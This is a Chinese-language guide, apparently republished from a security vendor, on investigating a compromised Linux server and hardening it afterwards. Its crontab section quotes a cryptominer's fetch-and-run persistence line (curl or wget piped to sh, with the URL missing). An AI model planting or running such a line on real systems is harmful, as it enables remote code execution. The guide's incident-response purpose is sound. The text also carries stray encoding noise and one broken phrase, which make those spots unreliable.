服務(wù)器被入侵如何排查？防止服務(wù)器被入侵和排

服務(wù)器被入侵如何排查？有些服務(wù)器被植入木馬后門(mén)、有些被檢查出有挖礦程序、有些發(fā)現登錄密碼不對，被惡意登錄修改了密碼，遇到了服務(wù)器被入侵的情況應第一時(shí)間聯(lián)系服務(wù)商售后處理將損失降低到最低程度，讓網(wǎng)站、游戲等業(yè)務(wù)恢復。

本文總結了一些服務(wù)器被入侵的排查方法，專(zhuān)門(mén)用來(lái)檢查服務(wù)器第一時(shí)間的安全問(wèn)題，看發(fā)生在哪里、服務(wù)器是否被黑、是否被攻擊、哪些被篡改等等!

如何排查服務(wù)器被攻擊?

首先我們會(huì )對當前服務(wù)器的IP，以及IP的地址，linux服務(wù)器名稱(chēng)，服務(wù)器的版本是centos,還是redhat，服務(wù)器的當前時(shí)間，進(jìn)行收集并記錄到一個(gè)txt文檔里，接下來(lái)再執行下一步，對當前服務(wù)器的異常網(wǎng)絡(luò )連接以及異常的系統進(jìn)程檢查，主要是通過(guò)netstat -an以及-antp命令來(lái)檢查服務(wù)器存在哪些異常的IP連接。并對連接的IP，進(jìn)行歸屬地查詢(xún)，如果是國外的IP，直接記錄當前進(jìn)程的PID值，并自動(dòng)將PID的所有信息記錄，查詢(xún)PID所在的linux文件地址，緊接著(zhù)檢查當前占用CPU大于百分之30的進(jìn)程，并檢查該進(jìn)程所在的文件夾。

服務(wù)器被入侵如何排查?

在我們處理客戶(hù)服務(wù)器被攻擊的時(shí)候發(fā)現很多服務(wù)器的命令被篡改，比如正常的PS查看進(jìn)程的，查詢(xún)目錄的 cd的命令都給篡改了，讓服務(wù)器無(wú)法正常使用命令，檢查服務(wù)器安全造成了困擾。對服務(wù)器的啟動(dòng)項進(jìn)行檢查，有些服務(wù)器被植入木馬后門(mén)，即使重啟服務(wù)器也還是被攻擊，木馬會(huì )自動(dòng)的啟動(dòng)，檢查linux的init.d的文件夾里是否有多余的啟動(dòng)文件，也可以檢查時(shí)間，來(lái)判斷啟動(dòng)項是否有問(wèn)題。

服務(wù)器被入侵如何排查?

再一個(gè)要檢查的地方是服務(wù)器的歷史命令，history很多服務(wù)器被黑都會(huì )留下痕跡，比如SSH登錄服務(wù)器后，攻擊者對服務(wù)器進(jìn)行了操作，執行了那些惡意命令都可以通過(guò)history查詢(xún)的到，有沒(méi)有使用wget命令下載木馬，或者執行S件。檢查服務(wù)器的所有賬號，以及當前使用并登錄的管理員賬戶(hù)，tty是本地用戶(hù)登錄，pst是遠程連接的用戶(hù)登錄，來(lái)排查服務(wù)器是否被黑，被攻擊，也可以檢查login.defs文件的uid值，判斷uid的passwd來(lái)獲取最近新建的管理員賬戶(hù)。執行cat etc/passwd命令檢查是否存在異常的用戶(hù)賬戶(hù)，包括特權賬戶(hù)，UID值為0。

服務(wù)器被入侵如何排查?

最重要的是檢查服務(wù)器的定時(shí)任務(wù)，前段時(shí)間某網(wǎng)站客戶(hù)中了挖礦病毒，一直占用CPU，查看了定時(shí)任務(wù)發(fā)現每15分鐘自動(dòng)執行下載命令，crontab -l */15 * * * * (curl -fsSL ||wget -q-O- )|sh 代碼如上，自動(dòng)下載并執行SH木馬文件。定時(shí)任務(wù)刪都刪不掉，最后通過(guò)檢查系統文件查到了木馬，并終止進(jìn)程，強制刪除。有些服務(wù)器被黑后，請立即檢查2天里被修改的文件，可以通過(guò)find命令去檢查所有的文件，看是否有木馬后門(mén)文件，如果有可以確定服務(wù)器被黑了。

以上就是服務(wù)器被入侵攻擊的檢查辦法，通過(guò)我們SINE安全給出的檢查步驟，挨個(gè)去檢查，就會(huì )發(fā)現出問(wèn)題，最重要的是要檢查日志，對這些日志要仔細的檢查，哪怕一個(gè)特征都會(huì )導致服務(wù)器陷入被黑，被攻擊的狀態(tài)，也希望我們的分享能夠幫助到更多需要幫助的人，服務(wù)器安全了，帶來(lái)的也是整個(gè)互聯(lián)網(wǎng)的安全。

排查的話(huà)，可以從以下幾個(gè)方面入手：

1、日志

查看/var/log下的日志，如果發(fā)現有大量SSH登錄失敗日志，并存在root用戶(hù)多次登錄失敗后成功登錄的記錄，這就符合暴力破解特征。

2、系統分析

對系統關(guān)鍵配置、賬號、歷史記錄等進(jìn)行排查，確認對系統的影響情況

發(fā)現/root/.bash_history內歷史記錄已經(jīng)被清除，其他無(wú)異常。

3、進(jìn)程分析

對當前活動(dòng)進(jìn)程、網(wǎng)絡(luò )連接、啟動(dòng)項、計劃任務(wù)等進(jìn)行排查

4、文件系統

查看系統關(guān)鍵的文件是否被修改等

5、后門(mén)排查

使用RKHunter掃描系統是否存在后門(mén)漏洞

加固建議

1) 禁用不必要啟動(dòng)的服務(wù)與定時(shí)任務(wù)

2) 修改所有系統用戶(hù)密碼，并滿(mǎn)足密碼復雜度要求：8位以上，包含大小寫(xiě)字母 數字 特殊符號組合;

3) 如非必要禁止SSH端口對外網(wǎng)開(kāi)放，或者修改SSH默認端口并限制允許訪(fǎng)問(wèn)IP;

假如有一天真的遇到攻擊了，怎么辦呢?再來(lái)給你們帶來(lái)一個(gè)好辦法：

事前檢查和監控

提前檢查

1. 服務(wù)器和網(wǎng)站漏洞檢測，對Web漏洞、弱口令、潛在的惡意行為、違法信息等進(jìn)行定期掃描。

2. 代碼的定期檢查，安全檢查，漏洞檢查。

3. 服務(wù)器安全加固，安全基線(xiàn)設置，安全基線(xiàn)檢查。

4. 數據庫執行的命令，添加字段、加索引等，必須是經(jīng)過(guò)測試檢查的命令，才能在正式環(huán)境運行。

數據備份

1. 服務(wù)器數據備份，包括網(wǎng)站程序文件備份，數據庫文件備份、配置文件備份，如有資源最好每小時(shí)備份和異地備份。

2. 建立五重備份機制：常規備份、自動(dòng)同步、LVM快照、Azure備份、S3備份。

3. 定期檢查備份文件是否可用，避免出故障后，備份數據不可用。

4. 重要數據多重加密算法加密處理。

5. 程序文件版本控制，測試，發(fā)布，故障回滾。

安全監控

1. nagios監控服務(wù)器常規狀態(tài)CPU負載、內存、磁盤(pán)、流量，超過(guò)閾值告警。

2. zabbix或cacti監控服務(wù)器常規狀態(tài)CPU負載、內存、磁盤(pán)、流量等狀態(tài)，可以顯示歷史曲線(xiàn)，方便排查問(wèn)題。

3. 監控服務(wù)器SSH登錄記錄、iptables狀態(tài)、進(jìn)程狀態(tài)，有異常記錄告警。

4. 監控網(wǎng)站W(wǎng)EB日志(包括nginx日志php日志等)，可以采用EKL來(lái)收集管理，有異常日志告警。

5. 運維人員都要接收告警郵件和短信，至少所負責的業(yè)務(wù)告警郵件和短信必須接收，運維經(jīng)理接收重要業(yè)務(wù)告警郵件和短信。(除非是專(zhuān)職運維開(kāi)發(fā))

6. 除服務(wù)器內部監控外，最好使用第三方監控，從外部監控業(yè)務(wù)是否正常(監控URL、端口等)，比如：云鎖。

來(lái)源鏈接：https://www.zyhot.com/article/13888.html

本站聲明:網(wǎng)站內容來(lái)源于網(wǎng)絡(luò ),如有侵權,請聯(lián)系我們,我們將及時(shí)處理。